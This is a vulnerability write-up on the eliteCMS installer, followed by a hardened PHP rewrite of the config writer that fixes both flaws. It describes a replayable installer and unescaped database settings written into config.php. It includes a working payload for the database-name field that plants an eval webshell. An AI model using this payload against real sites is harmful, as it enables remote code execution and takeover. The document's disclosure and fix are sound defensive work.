The eliteCMS installer is not locked once installation completes, so an attacker can re-run the installation simply by requesting the installer URL.

A second vulnerability: the installer can be made to write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated unescaped into double-quoted PHP literals
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";
    // the generated text, including the attacker-influenced values, is then written to disk
    $writer = fopen($file, 'w');
...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are stored without any validation. So if the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php.
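Below is a hardened rewrite of the same step-4 config writer, added here as an example; it is not eliteCMS code. It fixes both problems from this post: a lock file stops the installer from being replayed, and the DB settings are emitted with var_export() so a value can never break out of its PHP string literal, with a tokenizer check as a second line of defence before anything is written. The lock-file name (install.lock), the helper names, and the use of mysqli in place of the removed mysql_* functions are assumptions of this example.

```php
<?php
// Added example, not eliteCMS code: a hardened rewrite of the installer's
// step-4 config writer. Assumptions: the lock file name (install.lock), the
// helper names, and mysqli in place of the removed mysql_* functions.
declare(strict_types=1);

const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';

/**
 * The original, vulnerable shape: raw interpolation into a double-quoted
 * literal. Kept only so the tokenizer check below can be shown rejecting it.
 */
function buildConfigVulnerable(array $s): string
{
    return "<?php\n"
        . "define(\"DB_SERVER\", \"{$s['DB_SERVER']}\");\n"
        . "define(\"DB_NAME\", \"{$s['DB_NAME']}\");\n";
}

/**
 * Build config.php from the submitted settings. Every value is emitted with
 * var_export(), which yields a single-quoted, escaped PHP literal; a quote,
 * backslash or "?>" in the value therefore stays inside the literal and can
 * never switch the file back to HTML mode or start a new statement.
 */
function buildConfig(array $settings): string
{
    $keys = ['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'];
    $out = "<?php\n";
    foreach ($keys as $key) {
        $value = (string)($settings[$key] ?? '');
        if (strpos($value, "\0") !== false) {
            throw new InvalidArgumentException("$key contains a NUL byte");
        }
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($value, true) . ");\n";
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;
}

/**
 * Defence in depth: tokenise the generated text and confirm it is one PHP
 * script with a single open tag, no close tag and no inline HTML. A value
 * that managed to escape its literal shows up here as T_CLOSE_TAG.
 */
function configIsSingleScript(string $php): bool
{
    $opens = 0;
    foreach (token_get_all($php) as $tok) {
        if (!is_array($tok)) {
            continue;
        }
        if ($tok[0] === T_OPEN_TAG) {
            $opens++;
        } elseif ($tok[0] === T_CLOSE_TAG || $tok[0] === T_INLINE_HTML) {
            return false;
        }
    }
    return $opens === 1;
}

/** Step 4 of the installer, with the lock check the original lacks. */
function runStep4(array $settings): void
{
    // Refuse to run again once installation completed. This is what stops
    // "visit the installer URL and reinstall".
    if (file_exists(LOCK_FILE)) {
        http_response_code(403);
        exit('Installation already completed; remove install.lock to reinstall.');
    }
    $config = buildConfig($settings);
    if (!configIsSingleScript($config)) {
        exit('Refusing to write config.php: generated file is not a single PHP script.');
    }
    file_put_contents(CONFIG_FILE, $config, LOCK_EX);
    // Create the lock last, so a failed config write can be retried.
    file_put_contents(LOCK_FILE, date('c'), LOCK_EX);
}

// Demonstration with the payload from this post as the database name
// (constructed input; in the installer these come from $_SESSION).
$demo = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 'secret',
];
echo buildConfig($demo);
var_dump(configIsSingleScript(buildConfigVulnerable($demo)));
var_dump(configIsSingleScript(buildConfig($demo)));
```

With the post's payload as DB_NAME, the hardened builder produces `define('DB_NAME', '"?><?php eval($_POST[c]);?><?php');`, an inert string, and the tokenizer check passes; the same payload pushed through the vulnerable template yields a T_CLOSE_TAG token and is rejected. The lock check belongs at the top of the installer for every step, not only step 4, and deleting or web-blocking the install directory after setup remains the right operational follow-up.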